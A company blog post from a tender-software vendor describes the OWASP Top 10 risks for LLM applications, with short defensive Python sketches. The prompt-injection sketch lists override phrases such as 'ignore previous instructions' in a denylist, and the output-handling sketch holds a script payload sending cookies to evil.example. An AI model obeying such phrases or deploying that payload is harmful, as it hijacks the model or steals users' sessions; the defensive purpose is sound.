With great power comes great responsibility, and the deployment of large language models presents unique security challenges that require a tailored set of OWASP guidelines.
At Brainial we are ISO 27001 certified to ensure the safety of the data our clients upload to their Brainial AI-based Tender Assistant. We apply the OWASP standard as it provides a comprehensive set of guidelines and best practices to identify and mitigate common security risks in web applications.
As technology continues to evolve, large language models (LLMs), such as GPT-X, ChatGPT and their successors, have become more prevalent. LLMs are machine learning models trained on huge amounts of data and deployed in applications like ChatGPT. GPT-4 from OpenAI, BERT and LaMDA 2 from Google, and RoBERTa and LLaMA 2 from Meta are examples of LLMs. These models can generate human-like text, making them valuable tools for tasks like natural language processing, content generation and digital assistants.
At Brainial we also train, fine-tune and deploy our own LLMs (for example our proprietary TenderGPT model) in the tendering process, for example to summarise data, answer questions about tenders, and generate answers and draft text for AI-assisted proposal writing.
LLMs are very powerful, but with great power comes great responsibility: deploying large language models presents unique security challenges that call for a tailored set of OWASP guidelines.
The OWASP Top 10 for Large Language Model Applications project aims to educate developers, designers, architects, managers, and organisations about the potential security risks when deploying and managing Large Language Models (LLMs). The project provides a list of the top 10 most critical vulnerabilities often seen in LLM applications, highlighting their potential impact, ease of exploitation, and prevalence in real-world applications.
Examples of vulnerabilities include prompt injections, data leakage, inadequate sandboxing, and unauthorised code execution, among others. The goal is to raise awareness of these vulnerabilities, suggest remediation strategies, and ultimately improve the security posture of LLM applications.
When training, fine-tuning and implementing Large Language Models in our application, we check and validate against the common OWASP LLM vulnerabilities. This ensures safe use of LLM technology and protects our customers' LLM models and data.
At Brainial we apply the following checks and preventive measures.
Attackers can manipulate LLMs through crafted inputs, causing the model to carry out the attacker's intentions. This can happen directly, by overwriting or manipulating the system prompt, or indirectly, through manipulated external inputs, potentially leading to data exfiltration, social engineering and other issues.
Vulnerabilities:
Our preventive measures:
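To illustrate the kind of control involved, below is a minimal Python sketch (with hypothetical prompt text and a hypothetical pattern list, not our production code) that keeps trusted instructions separate from untrusted user input and screens that input for common injection phrases before it reaches the model.

```python
import re

# Trusted instructions live in the system role; untrusted user text never gets
# concatenated into them. Prompt text and patterns here are illustrative only.
SYSTEM_PROMPT = "You are a tender-analysis assistant. Answer only from the supplied documents."

# Naive denylist of phrases often seen in direct prompt-injection attempts.
SUSPICIOUS_PATTERNS = [
    r"ignore (all|previous) instructions",
    r"reveal (the )?system prompt",
    r"you are now",
]

def screen_user_input(text: str) -> str:
    """Block user text that looks like an injection attempt."""
    for pattern in SUSPICIOUS_PATTERNS:
        if re.search(pattern, text, flags=re.IGNORECASE):
            raise ValueError("Potential prompt injection detected; request blocked for review.")
    return text

def build_messages(user_text: str, context: str) -> list[dict]:
    """Keep the system prompt and the (screened) user input in separate roles."""
    return [
        {"role": "system", "content": SYSTEM_PROMPT},
        {"role": "user", "content": f"Context:\n{context}\n\nQuestion:\n{screen_user_input(user_text)}"},
    ]

if __name__ == "__main__":
    print(build_messages("What is the submission deadline?", "Tender XYZ, deadline 1 May."))
```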
Insecure Output Handling is a vulnerability that arises when a downstream component blindly accepts large language model (LLM) output without proper scrutiny. This can lead to XSS and CSRF in web browsers as well as SSRF, privilege escalation, or remote code execution on backend systems.
Vulnerabilities:
Our preventive measures:
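As an illustration, the sketch below (hypothetical, not our production code) treats model output as untrusted content and HTML-escapes it before it is rendered in a browser, so injected markup cannot execute.

```python
import html

def render_llm_output(raw_output: str) -> str:
    """Treat model output like untrusted user content: escape it at the boundary
    so embedded <script> tags or attribute payloads become inert text."""
    return html.escape(raw_output)

# Example: a model tricked into emitting markup is neutralised before rendering.
malicious = 'Summary <script>fetch("https://evil.example/?c=" + document.cookie)</script>'
print(render_llm_output(malicious))
```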
Training Data Poisoning refers to manipulating the data or fine-tuning process to introduce vulnerabilities, backdoors or biases that could compromise the model’s security, effectiveness or ethical behaviour. This risks performance degradation, downstream software exploitation and reputational damage.
Vulnerabilities:
Our preventive measures:
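A minimal sketch of the idea, assuming a hypothetical allowlist of data sources and pre-recorded checksums: fine-tuning records from unknown sources, or whose content no longer matches its recorded checksum, are rejected before training.

```python
import hashlib
import json

# Illustrative allowlist of data sources approved for fine-tuning.
APPROVED_SOURCES = {"internal-tender-archive", "curated-public-tenders"}

def record_checksum(record: dict) -> str:
    """Stable content hash used to detect tampering with a training record."""
    return hashlib.sha256(json.dumps(record["content"], sort_keys=True).encode()).hexdigest()

def validate_record(record: dict, known_checksums: set[str]) -> bool:
    """Reject records from unknown sources or with modified content."""
    if record.get("source") not in APPROVED_SOURCES:
        return False
    return record_checksum(record) in known_checksums

# Usage sketch
record = {"source": "internal-tender-archive", "content": "Q: deadline? A: 1 May."}
known = {record_checksum(record)}
print(validate_record(record, known))                                   # True
print(validate_record({"source": "random-forum", "content": "..."}, known))  # False
```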
Model Denial of Service occurs when an attacker interacts with a Large Language Model (LLM) in a way that consumes an exceptionally high amount of resources. This can result in a decline in the quality of service for them and other users, as well as potentially incurring high resource costs.
Vulnerabilities:
Our preventive measures:
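The sketch below illustrates two typical mitigations, with limits chosen purely for illustration: capping the size of a single prompt and rate-limiting requests per user before anything is forwarded to the model.

```python
import time
from collections import defaultdict, deque

MAX_INPUT_CHARS = 8_000        # cap prompt size so one request cannot exhaust context/compute
MAX_REQUESTS_PER_MINUTE = 20   # per-user rate limit (illustrative value)

_request_log: dict[str, deque] = defaultdict(deque)

def admit_request(user_id: str, prompt: str) -> bool:
    """Return True only if the request may be forwarded to the model."""
    if len(prompt) > MAX_INPUT_CHARS:
        return False
    now = time.monotonic()
    window = _request_log[user_id]
    # Drop timestamps older than the 60-second sliding window.
    while window and now - window[0] > 60:
        window.popleft()
    if len(window) >= MAX_REQUESTS_PER_MINUTE:
        return False
    window.append(now)
    return True
```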
Supply chain vulnerabilities in LLMs can compromise training data, ML models and deployment platforms, causing biased results, security breaches or total system failures. Such vulnerabilities can stem from outdated software, susceptible pre-trained models, poisoned training data and insecure plugin designs.
Vulnerabilities:
Our preventive measures:
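One illustrative control, sketched below with a placeholder checksum value: record the SHA-256 digest of every approved model artifact and refuse to load anything that does not match, alongside pinning library versions in the deployment.

```python
import hashlib
from pathlib import Path

# Illustrative registry of approved model artifacts; the digest is a placeholder,
# not a real value.
APPROVED_MODELS = {
    "tender-summariser-v3.bin": "expected-sha256-hex-digest-goes-here",
}

def verify_model_artifact(path: Path) -> bool:
    """Return True only if the artifact's SHA-256 matches the approved digest."""
    digest = hashlib.sha256(path.read_bytes()).hexdigest()
    expected = APPROVED_MODELS.get(path.name)
    return expected is not None and digest == expected

# A deployment step would call verify_model_artifact() and abort on mismatch,
# in addition to pinning exact library versions (e.g. a locked requirements file).
```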
LLM applications can inadvertently disclose sensitive information, proprietary algorithms, or confidential data, leading to unauthorised access, intellectual property theft, and privacy breaches. To mitigate these risks, LLM applications should employ data sanitisation, implement appropriate usage policies, and restrict the types of data returned by the LLM.
Vulnerabilities:
Our preventive measures:
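As a simplified illustration of data sanitisation, the sketch below redacts obvious personal data (e-mail addresses and phone numbers) before text is passed to or returned from a model; a production system would use a dedicated PII detector rather than two regular expressions.

```python
import re

# Deliberately simple patterns for illustration only.
EMAIL = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
PHONE = re.compile(r"\+?\d[\d\s-]{7,}\d")

def redact(text: str) -> str:
    """Replace obvious personal data with placeholders before it reaches the model."""
    text = EMAIL.sub("[REDACTED EMAIL]", text)
    text = PHONE.sub("[REDACTED PHONE]", text)
    return text

print(redact("Contact Jan at jan@example.com or +31 6 1234 5678 for the tender."))
```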
Plugins can be prone to malicious requests leading to harmful consequences like data exfiltration, remote code execution, and privilege escalation due to insufficient access controls and improper input validation. Developers must follow robust security measures to prevent exploitation, like strict parameterised inputs and secure access control guidelines.
Vulnerabilities:
Our preventive measures:
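The sketch below illustrates strict parameterised inputs for a hypothetical document-search plugin: the model can only trigger a narrow, typed and validated call, rather than passing arbitrary strings through the plugin boundary.

```python
from dataclasses import dataclass

# Illustrative allowlist of document types the plugin may search.
ALLOWED_DOCUMENT_TYPES = {"tender", "annex", "contract"}

@dataclass(frozen=True)
class SearchRequest:
    document_type: str
    query: str
    max_results: int = 5

    def __post_init__(self):
        # Validate every parameter before the plugin acts on it.
        if self.document_type not in ALLOWED_DOCUMENT_TYPES:
            raise ValueError(f"Unsupported document type: {self.document_type!r}")
        if not (1 <= self.max_results <= 20):
            raise ValueError("max_results must be between 1 and 20")
        if len(self.query) > 500:
            raise ValueError("query too long")

# The model can only trigger this narrow, validated call; it cannot smuggle raw SQL,
# shell commands or arbitrary URLs through the plugin boundary.
request = SearchRequest(document_type="tender", query="submission deadline")
```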
Excessive Agency in LLM-based systems/agents is a vulnerability caused by over-functionality, excessive permissions, or too much autonomy. To prevent this, developers need to limit plugin or agent functionality, permissions, and autonomy to what's absolutely necessary, track user authorization, require human approval for all actions, and implement authorization in downstream systems.
Vulnerabilities:
Our preventive measures:
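A minimal sketch of limiting an agent's autonomy, using hypothetical tool names: read-only tools run directly, anything with side effects is queued for human approval, and everything else is refused.

```python
# Illustrative tool allowlists; names are hypothetical.
READ_ONLY_TOOLS = {"search_documents", "summarise_section"}
APPROVAL_REQUIRED_TOOLS = {"send_email", "submit_proposal"}

pending_approvals: list[dict] = []

def dispatch_tool_call(tool: str, arguments: dict) -> str:
    """Execute only bounded, read-only tools; queue side-effecting ones for a human."""
    if tool in READ_ONLY_TOOLS:
        return f"executed {tool} with {arguments}"
    if tool in APPROVAL_REQUIRED_TOOLS:
        pending_approvals.append({"tool": tool, "arguments": arguments})
        return f"{tool} queued for human approval"
    raise PermissionError(f"Tool {tool!r} is not on the allowlist")

print(dispatch_tool_call("search_documents", {"query": "deadline"}))
print(dispatch_tool_call("send_email", {"to": "client@example.com"}))
```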
Over-reliance on output from LLMs can lead to serious consequences such as misinformation, legal issues, and security vulnerabilities. It occurs when an LLM is trusted to make critical decisions or generate content without adequate oversight or validation.
Vulnerabilities:
Our preventive measures:
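One simple form of output validation is a grounding check. The sketch below is a deliberately naive example: an answer is only accepted if every number it states also appears in the source documents, and is otherwise flagged for human review.

```python
import re

def extract_numbers(text: str) -> set[str]:
    """Collect numeric tokens (including comma/point groupings) from a text."""
    return set(re.findall(r"\d(?:[\d.,]*\d)?", text))

def is_grounded(answer: str, source_text: str) -> bool:
    """Every number the model states must be present in the source material."""
    return extract_numbers(answer) <= extract_numbers(source_text)

source = "The tender budget is 250,000 EUR and the deadline is 1 May 2024."
print(is_grounded("The budget is 250,000 EUR.", source))   # True
print(is_grounded("The budget is 300,000 EUR.", source))   # False -> flag for human review
```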
LLM model theft involves unauthorised access to and exfiltration of LLM models, risking economic loss, reputational damage, and unauthorised access to sensitive data. Robust security measures are essential to protect these models.
Vulnerabilities:
Our preventive measures:
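The sketch below illustrates two basic controls, with hypothetical account names: model weights are only served to authorised service accounts, and every access attempt is written to an audit log.

```python
import logging
from datetime import datetime, timezone

# Illustrative allowlist of service accounts permitted to fetch model weights.
AUTHORISED_ACCOUNTS = {"inference-service", "training-pipeline"}

logging.basicConfig(level=logging.INFO)
audit_log = logging.getLogger("model-access")

def fetch_model_weights(account: str, model_name: str) -> bytes:
    """Serve weights only to authorised accounts and audit every attempt."""
    timestamp = datetime.now(timezone.utc).isoformat()
    if account not in AUTHORISED_ACCOUNTS:
        audit_log.warning("%s DENIED %s requested %s", timestamp, account, model_name)
        raise PermissionError("Account is not authorised to download model weights")
    audit_log.info("%s GRANTED %s downloaded %s", timestamp, account, model_name)
    return b"..."  # placeholder for the actual artifact bytes

fetch_model_weights("inference-service", "tendergpt-v2")
```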
The world of LLMs is still new and can be overwhelming, with a lot of research and experimentation still going on and many areas still uncovered. However, it is clear that any company working with an LLM needs guidelines and checks in place, and the OWASP standard provides a good starting point. Since NLP technology and LLMs are a core part of our AI-powered Tender Assistant, we are committed to providing our customers and users with a solution that is safe and can be trusted. That is why we implemented an LLM usage policy and the OWASP LLM guidelines as part of our ISO 27001 certification. Read more about our safety and security measures in our ISO 27001 certification.
With Brainial's AI-powered technology, tender teams can easily find and qualify tenders, ensure they don't miss any critical information, get to the bottom of tender documents quickly and thoroughly, and find the information they need quickly and easily. By addressing these challenges, Brainial helps tender teams save time, reduce failure costs, and make more informed bid decisions. Check our AI Powered Tender Assist solution.